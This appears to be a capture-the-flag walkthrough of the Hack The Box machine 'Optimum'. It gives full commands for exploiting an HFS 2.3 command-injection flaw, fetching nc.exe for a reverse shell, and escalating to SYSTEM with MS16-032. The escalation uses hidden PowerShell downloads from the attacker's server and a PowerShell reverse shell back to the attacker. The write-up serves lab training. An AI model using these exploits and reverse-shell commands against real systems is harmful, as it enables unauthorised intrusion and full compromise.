We pick Optimum from the list:

Foothold

We start with the usual nmap:

nmap -sS -T4 -A -p- 10.10.10.8

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 12:48 EDT
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.12s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   129.85 ms 10.10.14.1
2   130.06 ms optimum.htb (10.10.10.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.32 seconds

While it loads, we try to see if there is a web portal on the default port 80.

Okay so we have a website. Let’s run a directory scan while we look around.

dirb http://10.10.10.8/ -i

At the bottom, when we hover or click the link, we see it goes to https://rejetto.com/hfs/, which tells us what type of service it is running and the link itself tells us the version.

We can do a search for any vulnerabilities:

searchsploit rejetto

There are a few remote exploits compatible with version 2.3.x.

Since our nmap scan results is fairly certain it is running a version of Windows, we can select the third one on the list:

searchsploit -x 39161
optimum-exploit

Basically the search function has a poor validated regex and allows the pipe in the URL to execute commands. In this script it setups a vbscript to run while pulling a nc.exe we will provide so we can connect through a reverse shell.

User

We make a copy of the python file:

cp /usr/share/exploitdb/exploits/windows/remote/39161.py optimum.py

Let’s open the file and make our changes:

vi optimum.py

Update the local IP to our Kali machine. You can also change the listener port if you’d like:

ip_addr = "10.10.XXX.XXX" #local IP address
local_port = "443" # Local Port number

Now the exploit script let’s us know we have to setup a web server on port 80 to pass the nc.exe file. If you are don’t want to use port 80 you could alter the vbs variable:

I will leave the default.

Save and exit with :wq.

Find a copy of nc.exe to run for Windows:

locate nc.exe

We then copy one to our directory and setup the web server:

cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80

Setup a listener before we run our python script:

nc -lvp 443

Now we can run it:

python optimum.py 10.10.10.8 80

Notice it taking our nc.exe file:

It works. We get connected.

We have a user: kostas and we start off in their directory. From here we can get our user flag.

type user.txt.txt

Privilege Escalation

Now let’s do some enumeration to do a privilege escalation.

systeminfo

On our local machine we can copy and paste the systeminfo output into a file.

vi optimum-sysinfo.txt

Paste the output in and save and exit with :wq.

With this, we can use a comparative tool, Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester that will figure out what vulnerabilities this machine may have.

wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

Get the database:

wget http://download.microsoft.com/download/6/7/3/673E4349-1CA5-40B9-8879-095C72D5B49D/BulletinSearch.xlsx

Download requirements

apt -y install python-xlrd

Run the comparison:

python windows-exploit-suggester.py --systeminfo optimum-sysinfo.txt --database BulletinSearch.xlsx

This gives a good list of possible vulnerabilities with PoC exploit examples.

After going through and weeding out different exploits, we can start to attempt MS16-032.

searchsploit MS16-032
optimum_ps_file_edit

Copy over the file:

cp /usr/share/exploitdb/exploits/windows/local/39719.ps1 .

Open the file to examine and edit:

vi 39719.ps1

It shows that we need to run the function Invoke-MS16-032 so we can add it to the end of the file so it runs once it builds the function. We could also import it but at this point we want it all done in one command.

optimum_ps_file_edit

Make sure our python web server is running still or we can re-initiate it, we go back to our Remote shell and download our new file:

powershell.exe -exec Bypass -nonI -window Hidden (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX/39719.ps1','C:\Users\kostas\Desktop\39719.ps1')

Then run the file:

powershell.exe -exec Bypass -nonI -window Hidden .\39719.ps1

The script runs, however it fails.

After looking around as to why, we realize it is defaulting to 32-bit powershell. I update the path and try it again:

%systemroot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -nonI -window Hidden .\39719.ps1
optimum-half-fail

This is successful however we don’t get access to the spawned shell.

After looking a round online I found two scripts that can help us out, which we can download:

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 && wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

The Invoke-MS16032.ps1 file is an updated version of our original exploit script except it allows commands to be run after the fact. Once I found that I attempted to run a few commands like netcat with powershell with a reverse shell to catch it but ran into a few troubles. So after more online research I found a reverse shell powershell script.

What I ended up doing was merging the functions into the same file then running the Invoke-MS16032 function and passing the Invoke-PowerShellTcp command with a reverse shell running on port 444.

Invoke-MS16032 -Command ("Invoke-PowerShellTcp -Reverse -IPAddress 10.10.X.X -Port 444")

Then we can copy the file over to the Remote shell:

powershell.exe -exec Bypass -nonI -window Hidden (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX/Invoke-MS16032.ps1','C:\Users\kostas\Desktop\Invoke-MS16032.ps1')

Then on our Local machine we can set another listener:

nc -lvp 444

On the Remote shell run the file:

%systemroot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -nonI -window Hidden .\Invoke-MS16032.ps1
optimum-success

Then we go to our listener on our Local machine:

optimum-success-shell

And we can see we get system access.

We can then go for the root flag:

type C:\Users\Administrator\Desktop\root.txt